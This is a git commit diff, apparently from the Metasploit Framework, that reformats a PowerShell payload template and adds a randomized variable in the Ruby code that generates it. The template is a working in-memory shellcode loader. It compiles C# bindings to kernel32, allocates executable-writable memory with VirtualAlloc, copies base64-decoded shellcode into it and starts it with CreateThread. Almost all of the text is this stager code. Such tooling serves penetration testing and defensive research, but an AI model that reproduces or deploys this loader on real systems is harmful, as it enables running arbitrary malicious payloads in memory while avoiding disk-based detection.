Dont tidy up template yet
parent
f1959f5313
commit
1f9b452425
|
@ -1,24 +1,30 @@
|
|||
Set-StrictMode -Version 2
|
||||
$%{var_syscode} = @"
|
||||
using System;
|
||||
using System.Runtime.InteropServices;
|
||||
namespace %{var_kernel32} {
|
||||
public class func {
|
||||
[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr a,uint b,uint c,uint d);
|
||||
[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr e,uint f,IntPtr g,IntPtr h,uint i,IntPtr j);
|
||||
[DllImport("kernel32.dll")]public static extern int WaitForSingleObject(IntPtr k,int l);
|
||||
}
|
||||
}
|
||||
using System;
|
||||
using System.Runtime.InteropServices;
|
||||
namespace %{var_kernel32} {
|
||||
public class func {
|
||||
[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
|
||||
[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
|
||||
[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
|
||||
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
||||
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
|
||||
[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
|
||||
}
|
||||
}
|
||||
"@
|
||||
$%{var_codeProvider}=New-Object Microsoft.CSharp.CSharpCodeProvider
|
||||
$%{var_compileParams}=New-Object System.CodeDom.Compiler.CompilerParameters
|
||||
$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll",[PsObject].Assembly.Location))
|
||||
$%{var_compileParams}.GenerateInMemory=$True
|
||||
$%{var_output}=$%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams},$%{var_syscode})
|
||||
[Byte[]]$%{var_code}=[System.Convert]::FromBase64String("%{b64shellcode}")
|
||||
$%{var_baseaddr}=[%{var_kernel32}.func]::VirtualAlloc(0,$%{var_code}.Length+1,0x3000,0x40)
|
||||
if([Bool]!$%{var_baseaddr}){$global:result=3;return}
|
||||
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code},0,$%{var_baseaddr},$%{var_code}.Length)
|
||||
[IntPtr] $%{var_threadHandle}=[%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
|
||||
if([Bool]!$%{var_threadHandle}){$global:result=7;return}
|
||||
[%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle},0xFFFFFFFF)
|
||||
|
||||
$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
|
||||
$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
|
||||
$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
|
||||
$%{var_compileParams}.GenerateInMemory = $True
|
||||
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
|
||||
|
||||
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
|
||||
|
||||
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
|
||||
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
|
||||
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
|
||||
[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
|
||||
if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
|
||||
$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
|
||||
|
|
|
@ -884,7 +884,7 @@ def self.to_vba(framework,code,opts={})
|
|||
|
||||
hash_sub = rig.to_h
|
||||
hash_sub[:shellcode] = Rex::Text.to_csharp(code, 100, rig[:var_bytearray])
|
||||
|
||||
|
||||
return read_replace_script_template("to_mem.aspx.template", hash_sub)
|
||||
end
|
||||
|
||||
|
@ -898,6 +898,7 @@ def self.to_vba(framework,code,opts={})
|
|||
rig.init_var(:var_codeProvider)
|
||||
rig.init_var(:var_compileParams)
|
||||
rig.init_var(:var_syscode)
|
||||
rig.init_var(:var_temp)
|
||||
|
||||
hash_sub = rig.to_h
|
||||
hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
|
||||
|
|
Loading…
Reference in New Issue